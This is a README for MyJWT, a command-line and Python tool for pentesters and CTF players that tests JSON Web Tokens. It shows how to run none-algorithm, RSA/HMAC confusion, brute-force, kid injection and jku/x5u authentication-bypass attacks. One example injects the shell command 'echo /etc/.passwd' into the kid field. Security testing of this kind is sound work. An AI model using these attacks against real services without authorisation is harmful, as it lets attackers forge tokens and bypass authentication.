MyJWT - A Cli For Cracking, Testing Vulnerabilities On Json Web Token (JWT)
This cli is for pentesters, CTF players, or dev.
You can modify your jwt, sign, inject ,etc...
Check Documentation for more information.
If you see problems or enhancement send an issue.I will respond as soon as possible. Enjoy :)
Documentation is available at
- copy new jwt to clipboard
- user Interface (thanks questionary)
- color output
- modify jwt (header/Payload)
- None Vulnerability
- RSA/HMAC confusion
- Sign a jwt with key
- Brute Force to guess key
- crack jwt with regex to guess key
- kid injection
- Jku Bypass
- X5u Bypass
To install myjwt, simply use pip:
pip install myjwt
To run mywt from a docker image, run:
docker run -it myjwt
# mount volume for wordlist
docker run -v $(pwd)/wordlist:/home/wordlist/ -it myjwt
# On Windows
docker run -v %CD%/wordlist:/home/wordlist/ -it myjwt
To install myjwt, on git:
git clone
cd ./MyJWT
pip install -r requirements.txt
python MyJWT/ --help
To install myjwt on BlackArch:
pacman -S myjwt
$ myjwt --help
Usage: myjwt [OPTIONS] JWT
This cli is for pentesters, CTF players, or dev.
You can modify your jwt, sign, inject ,etc...
Full documentation is at
If you see problems or enhancement send an issue.I will respond as soon as possible.
Enjoy :)
All new jwt will be copy to the clipboard.
--version Show the version and exit.
--full-payload TEXT New payload for your jwt.Json format Required.
-h, --add-header TEXT Add a new key, value to your jwt header, if key
is present old value will be replaced.Format:
-p, --add-payload TEXT Add a new key, value to your jwt payload, if
key is present old value will be
replaced.Format: key=value.
--sign TEXT Sign Your jwt with key given.
--verify TEXT verify your key.
-none, --none-vulnerability Check None Alg vulnerability.
--hmac PATH Check RS/HMAC Alg vulnerability.
--bruteforce PATH Bruteforce to guess the secret used to sign the
-c, --crack TEXT regex to iterate all string possibilities to
guess the secret used to sign the token.
--kid TEXT Kid Injection sql
--jku TEXT Jku Header to bypass authentication
--x5u TEXT X5u Header to bypass authen tication
--crt TEXT For x5cHeader, force crt file
--key TEXT For jku or x5c Header, force private key to
your key file
--file TEXT For jku Header and x5u Header, force file name
--print Print Decoded JWT
-u, --url TEXT Url to send your jwt.
-m, --method TEXT Method use for send request to url.(Default
-d, --data TEXT Data send to your url.Format: key=value. if
value = MY_JWT value will be replace by new
-c, --cookies TEXT Cookies to send to your url.Format: key=value.
if value = MY_JWT value will be replace by new
--help Show this message and exit.
Modify JWT
Option | Type | Example | help |
--ful-payload | JSON | {"user": "admin"} | New payload for your jwt. |
-h, --add-header | key=value | user=admin | Add a new key, value to your jwt header, if key is present old value will be replaced. |
-p, --add-payload | key=value | user=admin | Add a new key, value to your jwt payload, if key is present old value will be replaced. |
Check Your JWT (HS alg)
Option | Type | Example | help |
--sign | text | mysecretkey | Sign Your jwt with your key |
--verify | text | mysecretkey | Verify your key. |
Option | Type | Example | help |
-none, --none-vulnerability | Nothing | Check None Alg vulnerability. | |
--hmac | PATH | ./public.pem | Check RS/HMAC Alg vulnerability, and sign your jwt with public key. |
--bruteforce | PATH | ./wordlist/big.txt | Bruteforce to guess th secret used to sign the token. Use txt file with all password stored(1 by line) |
--crack | REGEX | "[a-z]{4}" | regex to iterate all string possibilities to guess the secret used to sign the token. |
--kid | text | "00; echo /etc/.passwd" | Kid Injection sql |
--jku | text | MYPUBLICIP | Jku Header to bypass authentication, use --file if you want to change your jwks file name, and --key if you want to use your own private pem |
--x5u | text | MYPUBLICIP | For jku or x5c Header, use --file if you want to change your jwks file name, and --key if you want to use your own private pem |
Send your jwt
Option | Type | Example | help |
-u, --url | url | | Url to send your jwt. |
-m, --method | text | POST | Method use to send request to url.(Default: GET). |
-d, --data | key=value | secret=MY_JWT | Data send to your url.Format: key=value. if value = MY_JWT value will be replace by your new jwt. |
-c, --cookies | key=value | secret=MY_JWT | Cookies to send to your url.Format: key=value.if value = MY_JWT value will be replace by your new jwt. |
Option | Type | Example | help |
--crt | PATH | ./public.crt | For x5cHeader, force crt file |
--key | PATH | ./private.pem | For jku or x5c Header, force private key to your key file |
--file | text | myfile | For jku Header, force file name without .json extension |
Nothing | Print Decoded JWT | ||
--help | Nothing | Show Helper message and exit. | |
--version | Nothing | Show Myjwt version |
- Modify Your jwt
- None Vulnerabilty Check
- Sign Key
- Brute Force Signature
- RSA/HMAC Confusion
- Kid Injection
- Send your new Jwt to url
- Jku Vulnerability
- X5u Vulnerability
Modify your Jwt
myjwt YOUR_JWT --add-payload "username=admin" --add-header "refresh=false"
from myjwt.modify_jwt import add_header, change_payload
from myjwt.utils import jwt_to_json, SIGNATURE, encode_jwt
jwt_json = jwt_to_json(jwt)
jwt_json = add_header(jwt_json, {"kid": "001"})
jwt_json = change_payload(jwt_json, {"username": "admin"})
jwt = encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE]
Full example here: 01-modify-jwt
None Vulnerability
myjwt YOUR_JWT --none-vulnerability
from myjwt.utils import jwt_to_json, SIGNATURE, encode_jwt
from myjwt.vulnerabilities import none_vulnerability
jwt_json = jwt_to_json(jwt)
jwt = none_vulnerability(encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE])
Full example here: 02-none-vulnerability
Sign Key
myjwt YOUR_JWT --sign YOUR_KEY
from myjwt.modify_jwt import signature
from myjwt.utils import jwt_to_json
key = "test"
jwt = signature(jwt_to_json(jwt), key)
Full example here: 03-sign-key
Brute Force
myjwt YOUR_JWT --bruteforce PATH
from myjwt.vulnerabilities import bruteforce_wordlist
wordlist = "../../wordlist/common_pass.txt"
key = bruteforce_wordlist(jwt, wordlist)
Full example here: 04-brute-force
myjwt YOUR_JWT --crack REGEX
RSA/HMAC Confusion
myjwt YOUR_JWT --hmac FILE
from myjwt.vulnerabilities import confusion_rsa_hmac
file = "public.pem"
jwt = confusion_rsa_hmac(jwt, file)
Full example here: 05-rsa-hmac-confusion
Kid Injection
from myjwt.modify_jwt import signature
from myjwt.utils import jwt_to_json
from myjwt.vulnerabilities import inject_sql_kid
injection = "../../../../../../dev/null"
sign = ""
jwt = inject_sql_kid(jwt, injection)
jwt = signature(jwt_to_json(jwt), sign)
Full example here: 06-kid-injection
Send your new Jwt to url
myjwt YOUR_JWT -u YOUR_URL -c "jwt=MY_JWT" --non-vulnerability --add-payload "username=admin"
Jku Vulnerability
myjwt YOUR_JWT --jku YOUR_URL
from myjwt.vulnerabilities import jku_vulnerability
new_jwt = jku_vulnerability(jwt=jwt, url="MYPUBLIC_IP")
Full example here: 07-jku-bypass
X5U Vulnerability
myjwt YOUR_JWT --x5u YOUR_URL
from myjwt.vulnerabilities import x5u_vulnerability
newJwt = x5u_vulnerability(jwt=jwt, url="MYPUBLIC_IP")
Full example here: 08-x5u-bypass
Check github releases. Latest is available at
- Fork this repository or clone it
- Create a new branch (feature, hotfix, etc...)
- Make necessary changes and commit those changes
- Check lint with
make flake8
- Check unit_test with
make test
- Send Pull Request I will check as Soon as Possible.
Change log
The log's become rather long. It moved to its own file.